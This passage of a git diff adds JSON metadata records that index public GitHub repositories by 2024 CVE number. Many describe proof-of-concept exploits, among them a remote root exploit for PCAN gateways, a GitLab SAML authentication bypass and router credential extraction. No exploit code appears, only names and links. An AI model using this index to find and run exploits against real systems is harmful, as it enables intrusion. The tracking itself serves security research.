"BertoldVdb\/PcanExploit", + "owner": { + "login": "BertoldVdb", + "id": 6325657, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6325657?v=4", + "html_url": "https:\/\/github.com\/BertoldVdb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BertoldVdb\/PcanExploit", + "description": "CVE-2024-44610: Authenticated remote root exploit in Peak PCAN-Ethernet CAN-(FD) gateways", + "fork": false, + "created_at": "2024-07-23T10:34:19Z", + "updated_at": "2024-10-04T04:03:14Z", + "pushed_at": "2024-09-30T17:08:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44623.json b/2024/CVE-2024-44623.json new file mode 100644 index 0000000000..0f79f6eeba --- /dev/null +++ b/2024/CVE-2024-44623.json @@ -0,0 +1,35 @@ +[ + { + "id": 857035292, + "name": "CVE-2024-44623", + "full_name": "merbinr\/CVE-2024-44623", + "owner": { + "login": "merbinr", + "id": 59112642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59112642?v=4", + "html_url": "https:\/\/github.com\/merbinr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/merbinr\/CVE-2024-44623", + "description": "Details about the Blind RCE issue(SPX-GC) in SPX-GC", + "fork": false, + "created_at": "2024-09-13T17:11:16Z", + "updated_at": "2024-09-17T06:32:24Z", + "pushed_at": "2024-09-13T18:17:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-44623" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44625.json b/2024/CVE-2024-44625.json new file mode 100644 index 0000000000..1a870b998d --- /dev/null +++ b/2024/CVE-2024-44625.json @@ -0,0 +1,33 @@ +[ + { + "id": 887990161, + "name": "CVE-2024-44625", + "full_name": "Fysac\/CVE-2024-44625", + "owner": { + "login": "Fysac", + "id": 6894940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6894940?v=4", + "html_url": "https:\/\/github.com\/Fysac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fysac\/CVE-2024-44625", + "description": "Symbolic link path traversal vulnerability in Gogs", + "fork": false, + "created_at": "2024-11-13T16:16:31Z", + "updated_at": "2025-01-05T10:04:20Z", + "pushed_at": "2024-11-14T02:54:13Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44765.json b/2024/CVE-2024-44765.json new file mode 100644 index 0000000000..3926fa12ee --- /dev/null +++ b/2024/CVE-2024-44765.json @@ -0,0 +1,33 @@ +[ + { + "id": 904747075, + "name": "cloudpanel-2.4.2-CVE-2024-44765-recovery", + "full_name": "josephgodwinkimani\/cloudpanel-2.4.2-CVE-2024-44765-recovery", + "owner": { + "login": "josephgodwinkimani", + "id": 13916761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13916761?v=4", + "html_url": "https:\/\/github.com\/josephgodwinkimani", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/josephgodwinkimani\/cloudpanel-2.4.2-CVE-2024-44765-recovery", + "description": "How to \"recover\" a CloudPanel server affected by the CVE-2024-44765 vulnerability", + "fork": false, + "created_at": "2024-12-17T13:29:38Z", + "updated_at": "2024-12-30T11:49:18Z", + "pushed_at": "2024-12-19T06:50:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44812.json b/2024/CVE-2024-44812.json new file mode 100644 index 0000000000..ee206157bf --- /dev/null +++ b/2024/CVE-2024-44812.json @@ -0,0 +1,33 @@ +[ + { + "id": 850367645, + "name": "CVE-2024-44812-PoC", + "full_name": "b1u3st0rm\/CVE-2024-44812-PoC", + "owner": { + "login": "b1u3st0rm", + "id": 47919595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47919595?v=4", + "html_url": "https:\/\/github.com\/b1u3st0rm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1u3st0rm\/CVE-2024-44812-PoC", + "description": "Proof of Concept Exploit for CVE-2024-44812 - SQL Injection Authentication Bypass vulnerability in Online Complaint Site v1.0", + "fork": false, + "created_at": "2024-08-31T15:20:27Z", + "updated_at": "2024-09-07T05:54:47Z", + "pushed_at": "2024-09-07T05:54:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44815.json b/2024/CVE-2024-44815.json new file mode 100644 index 0000000000..2b9acd0aef --- /dev/null +++ b/2024/CVE-2024-44815.json @@ -0,0 +1,33 @@ +[ + { + "id": 850270642, + "name": "Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-", + "full_name": "nitinronge91\/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-", + "owner": { + "login": "nitinronge91", + "id": 101330376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101330376?v=4", + "html_url": "https:\/\/github.com\/nitinronge91", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitinronge91\/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-", + "description": "CVE-2024-44815", + "fork": false, + "created_at": "2024-08-31T10:17:11Z", + "updated_at": "2024-09-09T08:04:29Z", + "pushed_at": "2024-09-09T07:54:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44849.json b/2024/CVE-2024-44849.json new file mode 100644 index 0000000000..6a5a3ce4b9 --- /dev/null +++ b/2024/CVE-2024-44849.json @@ -0,0 +1,33 @@ +[ + { + "id": 853571796, + "name": "CVE-2024-44849", + "full_name": "extencil\/CVE-2024-44849", + "owner": { + "login": "extencil", + "id": 132960975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132960975?v=4", + "html_url": "https:\/\/github.com\/extencil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/extencil\/CVE-2024-44849", + "description": "🔥 CVE-2024-44849 Exploit", + "fork": false, + "created_at": "2024-09-07T00:00:20Z", + "updated_at": "2024-11-11T17:22:24Z", + "pushed_at": "2024-09-11T21:45:23Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44867.json b/2024/CVE-2024-44867.json new file mode 100644 index 0000000000..a2ba6c431d --- /dev/null +++ b/2024/CVE-2024-44867.json @@ -0,0 +1,33 @@ +[ + { + "id": 854920423, + "name": "CVE-2024-44867", + "full_name": "ChengZyin\/CVE-2024-44867", + "owner": { + "login": "ChengZyin", + "id": 117956448, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117956448?v=4", + "html_url": "https:\/\/github.com\/ChengZyin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ChengZyin\/CVE-2024-44867", + "description": null, + "fork": false, + "created_at": "2024-09-10T01:49:36Z", + "updated_at": "2024-09-20T07:08:40Z", + "pushed_at": "2024-09-10T03:51:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44902.json b/2024/CVE-2024-44902.json new file mode 100644 index 0000000000..b79b58a233 --- /dev/null +++ b/2024/CVE-2024-44902.json @@ -0,0 +1,33 @@ +[ + { + "id": 852875618, + "name": "CVE-2024-44902", + "full_name": "fru1ts\/CVE-2024-44902", + "owner": { + "login": "fru1ts", + "id": 108859681, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108859681?v=4", + "html_url": "https:\/\/github.com\/fru1ts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fru1ts\/CVE-2024-44902", + "description": null, + "fork": false, + "created_at": "2024-09-05T15:22:22Z", + "updated_at": "2024-11-10T10:53:38Z", + "pushed_at": "2024-09-07T02:15:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44946.json b/2024/CVE-2024-44946.json new file mode 100644 index 0000000000..d439529324 --- /dev/null +++ b/2024/CVE-2024-44946.json @@ -0,0 +1,33 @@ +[ + { + "id": 850684151, + "name": "CVE-2024-44946", + "full_name": "Abdurahmon3236\/CVE-2024-44946", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-44946", + "description": null, + "fork": false, + "created_at": "2024-09-01T13:45:12Z", + "updated_at": "2024-09-02T00:39:50Z", + "pushed_at": "2024-09-01T13:48:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44947.json b/2024/CVE-2024-44947.json new file mode 100644 index 0000000000..740318a385 --- /dev/null +++ b/2024/CVE-2024-44947.json @@ -0,0 +1,33 @@ +[ + { + "id": 851814021, + "name": "CVE-2024-44947", + "full_name": "Abdurahmon3236\/CVE-2024-44947", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-44947", + "description": null, + "fork": false, + "created_at": "2024-09-03T18:37:40Z", + "updated_at": "2024-09-03T18:39:14Z", + "pushed_at": "2024-09-03T18:39:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45058.json b/2024/CVE-2024-45058.json new file mode 100644 index 0000000000..10efd9bfb9 --- /dev/null +++ b/2024/CVE-2024-45058.json @@ -0,0 +1,33 @@ +[ + { + "id": 850037289, + "name": "CVE-2024-45058", + "full_name": "0xbhsu\/CVE-2024-45058", + "owner": { + "login": "0xbhsu", + "id": 152667761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152667761?v=4", + "html_url": "https:\/\/github.com\/0xbhsu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xbhsu\/CVE-2024-45058", + "description": "PoC for CVE-2024-45058 Broken Access Control, allowing any user with view permission in the user configuration section to become an administrator changing their own user type.", + "fork": false, + "created_at": "2024-08-30T18:44:05Z", + "updated_at": "2024-09-08T20:02:26Z", + "pushed_at": "2024-09-08T20:01:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45200.json b/2024/CVE-2024-45200.json new file mode 100644 index 0000000000..70c306e808 --- /dev/null +++ b/2024/CVE-2024-45200.json @@ -0,0 +1,39 @@ +[ + { + "id": 856653771, + "name": "kartlanpwn", + "full_name": "latte-soft\/kartlanpwn", + "owner": { + "login": "latte-soft", + "id": 87558718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87558718?v=4", + "html_url": "https:\/\/github.com\/latte-soft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/latte-soft\/kartlanpwn", + "description": "Information & PoC for CVE-2024-45200, Mario Kart 8 Deluxe's \"KartLANPwn\" buffer overflow vulnerability", + "fork": false, + "created_at": "2024-09-13T00:41:32Z", + "updated_at": "2025-01-06T13:20:49Z", + "pushed_at": "2024-10-01T00:57:03Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2024-45200", + "mk8dx", + "nintendo-switch" + ], + "visibility": "public", + "forks": 1, + "watchers": 56, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45216.json b/2024/CVE-2024-45216.json new file mode 100644 index 0000000000..1665c71062 --- /dev/null +++ b/2024/CVE-2024-45216.json @@ -0,0 +1,33 @@ +[ + { + "id": 897120495, + "name": "CVE-2024-45216-Poc", + "full_name": "congdong007\/CVE-2024-45216-Poc", + "owner": { + "login": "congdong007", + "id": 104914028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104914028?v=4", + "html_url": "https:\/\/github.com\/congdong007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/congdong007\/CVE-2024-45216-Poc", + "description": null, + "fork": false, + "created_at": "2024-12-02T04:09:04Z", + "updated_at": "2024-12-05T00:10:27Z", + "pushed_at": "2024-12-02T04:16:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45241.json b/2024/CVE-2024-45241.json new file mode 100644 index 0000000000..8e6a6bab48 --- /dev/null +++ b/2024/CVE-2024-45241.json @@ -0,0 +1,71 @@ +[ + { + "id": 847361376, + "name": "CVE-2024-45241", + "full_name": "d4lyw\/CVE-2024-45241", + "owner": { + "login": "d4lyw", + "id": 53091736, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53091736?v=4", + "html_url": "https:\/\/github.com\/d4lyw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4lyw\/CVE-2024-45241", + "description": "Path Traversal in CentralSquare's CryWolf", + "fork": false, + "created_at": "2024-08-25T15:57:40Z", + "updated_at": "2024-09-18T22:48:09Z", + "pushed_at": "2024-08-25T16:09:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 859878308, + "name": "CVE-2024-45241", + "full_name": "verylazytech\/CVE-2024-45241", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-45241", + "description": null, + "fork": false, + "created_at": "2024-09-19T12:43:48Z", + "updated_at": "2024-12-30T21:06:51Z", + "pushed_at": "2024-11-26T14:47:16Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "centeralsquare", + "crywolf", + "cve-2024-45241", + "exploit", + "path-traversal", + "poc" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45244.json b/2024/CVE-2024-45244.json new file mode 100644 index 0000000000..df1618818d --- /dev/null +++ b/2024/CVE-2024-45244.json @@ -0,0 +1,100 @@ +[ + { + "id": 819022278, + "name": "HLF_TxTime_spoofing", + "full_name": "shanker-sec\/HLF_TxTime_spoofing", + "owner": { + "login": "shanker-sec", + "id": 88376669, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88376669?v=4", + "html_url": "https:\/\/github.com\/shanker-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanker-sec\/HLF_TxTime_spoofing", + "description": "PoC covering the problem of transaction time manipulation (CVE-2024-45244) in the Hyperledger Fabric blockchain.", + "fork": false, + "created_at": "2024-06-23T14:56:14Z", + "updated_at": "2024-08-27T10:04:52Z", + "pushed_at": "2024-08-14T07:48:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blockchain", + "chaincode", + "chaincode-go", + "cve-2024-45244", + "digital-finance", + "exploit", + "golang", + "hacking", + "hlf", + "hyperledger", + "hyperledger-fabric", + "proof-of-concept", + "smart-contracts", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834943647, + "name": "hlf-time-oracle", + "full_name": "shanker-sec\/hlf-time-oracle", + "owner": { + "login": "shanker-sec", + "id": 88376669, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88376669?v=4", + "html_url": "https:\/\/github.com\/shanker-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanker-sec\/hlf-time-oracle", + "description": "Chaincode for blockchain Hyperledger Fabric provides accurate time to other chaincodes. Thus solving the security problem associated with transaction time manipulation (CVE-2024-45244).", + "fork": false, + "created_at": "2024-07-28T19:19:42Z", + "updated_at": "2024-08-28T15:23:39Z", + "pushed_at": "2024-08-28T15:23:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blockchain", + "blockchain-security", + "blockchain-tool", + "chaincode", + "chaincode-go", + "cve-2024-45244", + "defensive-security", + "distributed-ledger-technology", + "golang", + "hlf", + "hyperledger", + "hyperledger-fabric", + "mitm", + "ntp-client", + "ntp-protocol", + "nts-client", + "nts-protocol", + "security-tools", + "smart-contract-security", + "smart-contracts" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45264.json b/2024/CVE-2024-45264.json new file mode 100644 index 0000000000..661b3c8b4b --- /dev/null +++ b/2024/CVE-2024-45264.json @@ -0,0 +1,33 @@ +[ + { + "id": 847669530, + "name": "CVE-2024-45264", + "full_name": "TheHermione\/CVE-2024-45264", + "owner": { + "login": "TheHermione", + "id": 73027590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73027590?v=4", + "html_url": "https:\/\/github.com\/TheHermione", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheHermione\/CVE-2024-45264", + "description": " CVE-2024-45264", + "fork": false, + "created_at": "2024-08-26T10:10:52Z", + "updated_at": "2024-08-26T11:03:27Z", + "pushed_at": "2024-08-26T10:56:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45265.json b/2024/CVE-2024-45265.json new file mode 100644 index 0000000000..9b20c6b188 --- /dev/null +++ b/2024/CVE-2024-45265.json @@ -0,0 +1,33 @@ +[ + { + "id": 847689277, + "name": "CVE-2024-45265", + "full_name": "TheHermione\/CVE-2024-45265", + "owner": { + "login": "TheHermione", + "id": 73027590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73027590?v=4", + "html_url": "https:\/\/github.com\/TheHermione", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheHermione\/CVE-2024-45265", + "description": "CVE-2024-45265", + "fork": false, + "created_at": "2024-08-26T11:02:37Z", + "updated_at": "2024-08-26T11:05:59Z", + "pushed_at": "2024-08-26T11:05:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45337.json b/2024/CVE-2024-45337.json new file mode 100644 index 0000000000..e5f000baa2 --- /dev/null +++ b/2024/CVE-2024-45337.json @@ -0,0 +1,74 @@ +[ + { + "id": 904960744, + "name": "CVE-2024-45337-POC", + "full_name": "NHAS\/CVE-2024-45337-POC", + "owner": { + "login": "NHAS", + "id": 6820641, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6820641?v=4", + "html_url": "https:\/\/github.com\/NHAS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NHAS\/CVE-2024-45337-POC", + "description": "Proof of concept (POC) for CVE-2024-45337 ", + "fork": false, + "created_at": "2024-12-17T22:07:53Z", + "updated_at": "2024-12-19T08:35:28Z", + "pushed_at": "2024-12-17T22:27:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-45337", + "exploit", + "golang", + "hack", + "pentesting", + "poc", + "proof-of-concept", + "ssh" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 904964693, + "name": "VULNERABLE-CVE-2024-45337", + "full_name": "NHAS\/VULNERABLE-CVE-2024-45337", + "owner": { + "login": "NHAS", + "id": 6820641, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6820641?v=4", + "html_url": "https:\/\/github.com\/NHAS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NHAS\/VULNERABLE-CVE-2024-45337", + "description": "An example project that showcases golang code vulnerable to CVE-2024-45337", + "fork": false, + "created_at": "2024-12-17T22:22:03Z", + "updated_at": "2024-12-17T22:25:52Z", + "pushed_at": "2024-12-17T22:25:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45383.json b/2024/CVE-2024-45383.json new file mode 100644 index 0000000000..2de7d038ff --- /dev/null +++ b/2024/CVE-2024-45383.json @@ -0,0 +1,33 @@ +[ + { + "id": 859399058, + "name": "CVE-2024-45383", + "full_name": "SpiralBL0CK\/CVE-2024-45383", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-45383", + "description": " poc for CVE-2024-45383", + "fork": false, + "created_at": "2024-09-18T15:40:19Z", + "updated_at": "2024-09-30T15:20:42Z", + "pushed_at": "2024-09-18T15:40:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45409.json b/2024/CVE-2024-45409.json new file mode 100644 index 0000000000..bf0dae2e55 --- /dev/null +++ b/2024/CVE-2024-45409.json @@ -0,0 +1,33 @@ +[ + { + "id": 868840911, + "name": "CVE-2024-45409", + "full_name": "synacktiv\/CVE-2024-45409", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/CVE-2024-45409", + "description": "Ruby-SAML \/ GitLab Authentication Bypass (CVE-2024-45409) exploit", + "fork": false, + "created_at": "2024-10-07T09:24:46Z", + "updated_at": "2024-11-27T12:56:27Z", + "pushed_at": "2024-10-07T11:50:17Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 74, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45410.json b/2024/CVE-2024-45410.json new file mode 100644 index 0000000000..dd7d70d977 --- /dev/null +++ b/2024/CVE-2024-45410.json @@ -0,0 +1,33 @@ +[ + { + "id": 863444819, + "name": "traefik-CVE-2024-45410-poc", + "full_name": "jphetphoumy\/traefik-CVE-2024-45410-poc", + "owner": { + "login": "jphetphoumy", + "id": 10437801, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10437801?v=4", + "html_url": "https:\/\/github.com\/jphetphoumy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jphetphoumy\/traefik-CVE-2024-45410-poc", + "description": "A proof of concept of traefik CVE to understand the impact", + "fork": false, + "created_at": "2024-09-26T09:58:27Z", + "updated_at": "2024-09-26T21:26:32Z", + "pushed_at": "2024-09-26T13:45:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45436.json b/2024/CVE-2024-45436.json new file mode 100644 index 0000000000..2f58a5620c --- /dev/null +++ b/2024/CVE-2024-45436.json @@ -0,0 +1,69 @@ +[ + { + "id": 875929293, + "name": "CVE-2024-45436", + "full_name": "pankass\/CVE-2024-45436", + "owner": { + "login": "pankass", + "id": 87853664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87853664?v=4", + "html_url": "https:\/\/github.com\/pankass", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pankass\/CVE-2024-45436", + "description": "CVE-2024-45436", + "fork": false, + "created_at": "2024-10-21T05:44:49Z", + "updated_at": "2024-10-23T02:33:48Z", + "pushed_at": "2024-10-21T05:47:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891956571, + "name": "cve-2024-45436-exp", + "full_name": "XiaomingX\/cve-2024-45436-exp", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-45436-exp", + "description": "This repository contains an exploit demonstration for CVE-2024-45436, a critical vulnerability affecting specific software versions. It highlights the exploitation mechanism and provides insights for security researchers to understand and mitigate the risk. ", + "fork": false, + "created_at": "2024-11-21T09:03:21Z", + "updated_at": "2024-12-08T18:37:47Z", + "pushed_at": "2024-11-21T09:08:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exp", + "ollama", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45440.json b/2024/CVE-2024-45440.json new file mode 100644 index 0000000000..18948c6a34 --- /dev/null +++ b/2024/CVE-2024-45440.json @@ -0,0 +1,33 @@ +[ + { + "id": 908604410, + "name": "CVE-2024-45440", + "full_name": "w0r1i0g1ht\/CVE-2024-45440", + "owner": { + "login": "w0r1i0g1ht", + "id": 78846391, + 